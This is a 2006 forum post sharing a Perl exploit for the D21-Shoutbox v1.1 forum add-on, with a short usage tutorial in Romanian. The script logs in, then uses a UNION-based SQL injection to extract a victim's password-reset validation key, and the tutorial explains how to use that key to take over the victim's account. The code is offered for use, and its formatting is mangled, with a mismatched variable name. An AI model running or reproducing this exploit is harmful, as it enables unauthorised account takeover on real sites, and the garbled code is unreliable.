Screech Posted July 18, 2006 Report Posted July 18, 2006 Exploit:#################################################!/usr/bin/perl ## D21-Shoutbox v1.1 Exploit Admin Password Change ## Author: Synsta ## Usuage Tutorial: ## Orginal Exploit Found by Windak & langtuhaohoa #################################################use HTTP::Cookies;use LWP 5.64;use HTTP::Request;# variablesmy $login_page = '?act=Login&CODE=01';my $id = '';my $table_fix = '';my $pose_pm_page = '?';my $tries = 5;my $sql = '';my $i;my $j;# objectsmy $ua = LWP::UserAgent->new;my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);my $resp;# init the cookie jar$ua->cookie_jar ($cj);# allow redirects on post requestspush @{ $ua->requests_redirectable }, "POST";# get user inputprint 'Shoutbox URL (ex: ';chomp (my $base_url = <STDIN>);print 'Your Username: ';chomp (my $user = <STDIN>);$form{entered_name} = $user;print 'Your Password: ';# systems without stty will error otherwisemy $stty = -x '/bin/stty';system 'stty -echo' if $stty; # to turn off echoingchomp (my $pass = <STDIN>);system 'stty echo' if $stty; # to turn it back onprint "n" if $stty;print 'ID:'; # it'll say next to one of their postschomp (my $id = <STDIN>);print 'Table prefix (ex: ibf_): ';chomp ( my $table_fix = <STDIN>);if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url }if ($base_url !~ m#/$|index.php$#) { $base_url .= '/' }do { $resp = $ua->post ($base_url . $login_page, [ UserName => $user, PassWord => $pass, CookieDate => 1, ]);} while ($tries-- && !$resp->is_success());# did we get 200 (OK) ?if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "n" }# was the pass right ?if ($resp->content =~ /sorry, the password was wrong/i) { die "Error: password incorrect.n";}$| = 1;print "nAttempting to extract validation key from the database...n ";$sql = "?act=Shoutbox&view=mycp?=ignored&do=add&id=-1 union select vid,1,1 from ".$table_fix."validating where member_id=". $id ."/*";$resp = $ua->get ($base_url . $post_pm_page . $sql );if (!$resp->is_success()) { print "ERROR" ;}else { print "" ; #print $resp->content; $rs=$resp->content; if ( $rs =~ /uid=([a-z,0-9]{32})/ ) { print "nValidation Key: "; print $1 ; print "n nAuthor: Synstan"; print "Website: w4ck1ng.comn"; print "Usage Tutorial:";} else { print "Can't get the pass from output, try to find it manually : "; print $resp->content;} }<STDIN>;[/list:u]Tut: 1.Du-te in forumul unde e instalat shoutbox-ul, acum click pe formul I've forgotten my password! Click here! pune nicul celui care vrei sa-i schimbi parola si codul si apasa Proceed2. Ruleaza exploitul3. Acum veti primi Validation Key, acum du-te la formul de validare (site/forum/index.php?act=Reg&CODE=lostpassform de obicei), pune id-ulvictimei, key-ul... si ai schimbat parola Quote